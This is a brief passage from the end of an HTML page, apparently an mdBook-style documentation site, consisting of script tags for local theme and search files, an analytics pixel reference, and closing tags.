src="../../highlight.js"></script> <script src="../../book.js"></script>  <script src="../../theme/pagetoc.js"></script> <script src="../../theme/tabs.js"></script> <script src="../../theme/ht_searcher.js"></script> <script src="../../theme/sponsor.js"></script> <script src="../../theme/ai.js"></script>  <script defer src="https://www.fairanalytics.de/pixel/deXeO7BNBrMuhdG1"></script> </div> </body> </html>